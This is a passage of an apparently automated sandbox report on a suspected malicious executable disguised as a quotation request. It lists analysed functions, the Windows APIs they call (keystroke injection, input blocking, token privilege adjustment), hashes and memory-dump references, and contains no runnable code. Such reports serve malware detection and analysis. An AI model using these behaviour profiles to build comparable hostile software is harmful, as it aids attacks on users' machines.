                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                                                                                    • Instruction ID: 252280e8e656c53b127d1db349f06a83f8e0cdfe11b8d9254b29ecd7f162768b
                                                                                                                    • Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                                                                                    • Instruction Fuzzy Hash: 72020D72E002199BDF14CFA9C8806ADFBF1FF88324F258169D919F7384D731AA419B94
                                                                                                                    Function 00F868EE Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00F86918
                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00F86961
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Find$CloseFileFirst
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2295610775-0
                                                                                                                    • Opcode ID: 5508006847b5fcfcf53225e53e600217abee75a17687e1e9cf6904664682faf6
                                                                                                                    • Instruction ID: bbc358a6097a4562f4ac012306ad1b81ae961c4eaba3d2950a99b090e46f6488
                                                                                                                    • Opcode Fuzzy Hash: 5508006847b5fcfcf53225e53e600217abee75a17687e1e9cf6904664682faf6
                                                                                                                    • Instruction Fuzzy Hash: BE119D716042009FC710DF29D888A56BBE5FF89328F15C6A9E4698F7A2CB34EC45DBD1
                                                                                                                    Function 00F837B5 Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00F94891,?,?,00000035,?), ref: 00F837E4
                                                                                                                    • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00F94891,?,?,00000035,?), ref: 00F837F4
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorFormatLastMessage
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3479602957-0
                                                                                                                    • Opcode ID: 0d7e505d9230bb352af77b919dc0fe6862a0ea7e5c02ee65f588689683d3a4d2
                                                                                                                    • Instruction ID: 1cf98f57ced605e612b1ed233419090075cf1affcdbb3f75671321deaa1d13b4
                                                                                                                    • Opcode Fuzzy Hash: 0d7e505d9230bb352af77b919dc0fe6862a0ea7e5c02ee65f588689683d3a4d2
                                                                                                                    • Instruction Fuzzy Hash: 82F0E5B16083292AEB2027668C4DFEB3AAEEFC5B61F000175F509D2291D9A09944D7F0
                                                                                                                    Function 00F7B226 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00F7B25D
                                                                                                                    • keybd_event.USER32(?,7707C0D0,?,00000000), ref: 00F7B270
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InputSendkeybd_event
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3536248340-0
                                                                                                                    • Opcode ID: bad2e2111c267f35d4f88ae1c39f124d006429296c8a1d05227b16de45e29c40
                                                                                                                    • Instruction ID: 1a3ea2ac728fd1c349afb41a4195f9ec151af25b705d897aee6a77f92e883d8b
                                                                                                                    • Opcode Fuzzy Hash: bad2e2111c267f35d4f88ae1c39f124d006429296c8a1d05227b16de45e29c40
                                                                                                                    • Instruction Fuzzy Hash: C2F01D7180424DABDB059FA0C805BBE7BB4FF09319F04800AF955A5192C7798611EF95
                                                                                                                    Function 00F710BF Relevance: 3.0, APIs: 2, Instructions: 24COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00F711FC), ref: 00F710D4
                                                                                                                    • CloseHandle.KERNEL32(?,?,00F711FC), ref: 00F710E9
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 81990902-0
                                                                                                                    • Opcode ID: 7da9d1ae50c9b2b4408771a6d90886592c56d1814bce19c6e18175cb7532ce52
                                                                                                                    • Instruction ID: 0514453781fee335ad85930983739fd0820b29c5ee54ac5353291c8b8a86a99f
                                                                                                                    • Opcode Fuzzy Hash: 7da9d1ae50c9b2b4408771a6d90886592c56d1814bce19c6e18175cb7532ce52
                                                                                                                    • Instruction Fuzzy Hash: C1E0BF72414610AEF7252B55FC05E7777A9EF05320B14C82EF5A6804B1DB626C94EB50
                                                                                                                    Function 00F1CAF0 Relevance: 1.9, Strings: 1, Instructions: 659COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    • Variable is not of type 'Object'., xrefs: 00F60C40
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: Variable is not of type 'Object'.
                                                                                                                    • API String ID: 0-1840281001
                                                                                                                    • Opcode ID: d47e7e45c4aba19673204b89e5bc50577d544079c9a1d200dbd457d1540589d7
                                                                                                                    • Instruction ID: 516f6a1b03181ede6e80e3a35b295478c87a84e1a201a30ee190de9dea823cea
                                                                                                                    • Opcode Fuzzy Hash: d47e7e45c4aba19673204b89e5bc50577d544079c9a1d200dbd457d1540589d7
                                                                                                                    • Instruction Fuzzy Hash: 9B329E31D40218DFCF14DF90D881BEEB7B5BF15314F248059E806AB292DB75AD86EBA1
                                                                                                                    Function 00F4676B Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00F46766,?,?,00000008,?,?,00F4FEFE,00000000), ref: 00F46998
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ExceptionRaise
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3997070919-0
                                                                                                                    • Opcode ID: a049aceb04a21786fcacd38b5e7b45afd24153aa98f4b7e7acc12fd48b882e49
                                                                                                                    • Instruction ID: ac7f79ed9e97b0c9099b83bfe9719a6c352fadc8cd26319b109b4dacf9533854
                                                                                                                    • Opcode Fuzzy Hash: a049aceb04a21786fcacd38b5e7b45afd24153aa98f4b7e7acc12fd48b882e49
                                                                                                                    • Instruction Fuzzy Hash: 4FB15A32A106089FD719CF28C48AB657FE0FF46364F258658EC99CF2A2C735E981DB41
                                                                                                                    Function 00F2B119 Relevance: 1.8, Strings: 1, Instructions: 511COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 0-3916222277
                                                                                                                    • Opcode ID: 05032a61a5206a586b7314abb3bc315c47e3a1d65d7519c422dd55d0decdcac2
                                                                                                                    • Instruction ID: f42512728ffd1ffaed5edd00e7508ab2fa833c51ea1ff43160a61baf3b4d04ff
                                                                                                                    • Opcode Fuzzy Hash: 05032a61a5206a586b7314abb3bc315c47e3a1d65d7519c422dd55d0decdcac2
                                                                                                                    • Instruction Fuzzy Hash: 5F126E71D002299BCB24DF58D8917EEB7F5FF48310F14819AE849EB251EB349E81EB90
                                                                                                                    Function 00F8EAA2 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • BlockInput.USER32(00000001), ref: 00F8EABD
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: BlockInput
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3456056419-0
                                                                                                                    • Opcode ID: dff70facf044d998e298d7577d72d2728f5d46ae096e058df3a2c2c63b8ed512
                                                                                                                    • Instruction ID: d04f599df1d6e20061184d993b574be30c0edbc84a11a0c93c3176922ccbd182
                                                                                                                    • Opcode Fuzzy Hash: dff70facf044d998e298d7577d72d2728f5d46ae096e058df3a2c2c63b8ed512
                                                                                                                    • Instruction Fuzzy Hash: 50E04F322002049FC710EF59D804EDAF7E9AF98770F048416FC49C7351DB74E8819BA0
                                                                                                                    Function 00F309D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,00F303EE), ref: 00F309DA
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3192549508-0
                                                                                                                    • Opcode ID: ebb2b841400283a49fcc91d093c12057f4637e541e18f11ab124a6ebce57aa73
                                                                                                                    • Instruction ID: df6577423455aa1cf95e483709b0190d169b60b5a887982c142aa7488a14baaf
                                                                                                                    • Opcode Fuzzy Hash: ebb2b841400283a49fcc91d093c12057f4637e541e18f11ab124a6ebce57aa73
                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                    Function 00F3781B Relevance: 1.5, Strings: 1, Instructions: 214COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 0
                                                                                                                    • API String ID: 0-4108050209
                                                                                                                    • Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                                                                                    • Instruction ID: ce5a7c3651295effc828a2114b6b761e8187784c81ba9eefb021d64917570584
                                                                                                                    • Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                                                                                    • Instruction Fuzzy Hash: FA5138E2E0D7456BDF38B568885A7BF73C59B02370F280A09E882D7282C619DE06F351
                                                                                                                    Function 00F46DD9 Relevance: .6, Instructions: 637COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: c8d2675b50eb4c0e863bbbe7060efa20091ad094efa5aa3f1152c6fc4a85f423
                                                                                                                    • Instruction ID: ab1485a48399d73373109667bad0618777ba715691f5b975689aec4f5ba589d7
                                                                                                                    • Opcode Fuzzy Hash: c8d2675b50eb4c0e863bbbe7060efa20091ad094efa5aa3f1152c6fc4a85f423
                                                                                                                    • Instruction Fuzzy Hash: 22326522D28F014DDB63A634CC62336AA49AFB73D5F15C737FC1AB59A5EB28C4836500
                                                                                                                    Function 00F2CC39 Relevance: .6, Instructions: 635COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 897280c0ebf088fe90b6518e9cc62b07a3043a949685685e5ef1589b6be7ac4b
                                                                                                                    • Instruction ID: d9120c73bdaf91d5111f0c84c3c116f4083894ca1b6301cd0d51e54f609e13c5
                                                                                                                    • Opcode Fuzzy Hash: 897280c0ebf088fe90b6518e9cc62b07a3043a949685685e5ef1589b6be7ac4b
                                                                                                                    • Instruction Fuzzy Hash: FA320532E011958BCF28CF69D89467D7BA1EB45320F28816BD5DADB291D234DE81FBC1
                                                                                                                    Function 00F17920 Relevance: .6, Instructions: 563COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 7b1f8c9ac2d6f7ffe0dff9c973d93f5f5752b00b0fcb4e4d4c42cabb43e02316
                                                                                                                    • Instruction ID: 1cb43ad020efc10200bbca358d88eb3b0f09850c97b8c18d3710edd44ed8f8e5
                                                                                                                    • Opcode Fuzzy Hash: 7b1f8c9ac2d6f7ffe0dff9c973d93f5f5752b00b0fcb4e4d4c42cabb43e02316
                                                                                                                    • Instruction Fuzzy Hash: 5322E271E0460ADFDF04DF64C851AEEB3B6FF44710F204129E816A7291EB3AAD55EB50
                                                                                                                    Function 00F191C0 Relevance: .5, Instructions: 475COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 7e6923a5f7333d6e1b12b091cb60ad05e70178de040bc68afc9afd515a9dfd31
                                                                                                                    • Instruction ID: 5097d3109d3c59b918dc8fd2585819a4be7092ffd20809b6bdc04fb1bf4d90a2
                                                                                                                    • Opcode Fuzzy Hash: 7e6923a5f7333d6e1b12b091cb60ad05e70178de040bc68afc9afd515a9dfd31
                                                                                                                    • Instruction Fuzzy Hash: 7002F6B1E00209EBCB04DF64D881AAEB7B5FF44310F118169E916DB290EB75EE54EBC1
                                                                                                                    Function 00F49EEE Relevance: .3, Instructions: 294COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: a8e6f6e119d1d6148f1026721463ab8bf85f9599bad13c5199d152a2780fcd63
                                                                                                                    • Instruction ID: 0ed121aa1ab8f7d50edaadc55d30f74b73b75237e1ff32fbad1d4fe60f6fbe9e
                                                                                                                    • Opcode Fuzzy Hash: a8e6f6e119d1d6148f1026721463ab8bf85f9599bad13c5199d152a2780fcd63
                                                                                                                    • Instruction Fuzzy Hash: CAB11320D6AF444DD3239A398871337BA8CAFBB2D5F95D31BFC1674D22EB2286835540
                                                                                                                    Function 00F31C77 Relevance: .3, Instructions: 254COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                                    • Instruction ID: be3f717f30267bba8d75a1f2af84a67dfeea039e6a4eaf72143a4ae1b20819aa
                                                                                                                    • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                                    • Instruction Fuzzy Hash: 04918933A090A34ADB69463E853417EFFE17A523B1B1A079DD8F2CA1C1FE10D954F620
                                                                                                                    Function 00F319B0 Relevance: .2, Instructions: 240COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
